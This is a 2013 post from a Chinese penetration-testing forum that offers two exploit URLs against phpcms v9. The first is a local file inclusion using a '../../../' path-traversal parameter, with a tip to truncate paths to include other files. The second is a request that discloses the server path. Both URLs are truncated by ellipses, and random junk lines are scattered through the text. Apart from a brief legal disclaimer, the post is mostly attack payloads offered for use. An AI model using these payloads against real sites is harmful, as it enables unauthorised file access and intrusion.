中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
( ~* l9 H& z5 O3 s$ y
& q) I- @# x) {6 O( f, r. D+ A
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
. o. K/ F, r6 H" J
. Z6 h& P# z: I! g8 `5 |0 `
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
8 r0 K3 |: w% s! ]* y2 ~
0 n: Y" T. p# A. e. P9 g# ]- E, T1 V9 Y4 X
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
?9 n5 @- l i
2 F# i/ i! f; Y3 O c* A8 r/ P( U
#暴路径
3 T% }; m& F& \2 Y1 {% W
6 Z9 Q! _2 L1 i, l) {) |
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
! t5 U$ \) D2 \- B
7 ~% g& @. f+ U5 E/ R$ K
5 T6 U! D9 i: C# U& T
- d" U$ R' w6 i) Y
+1
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2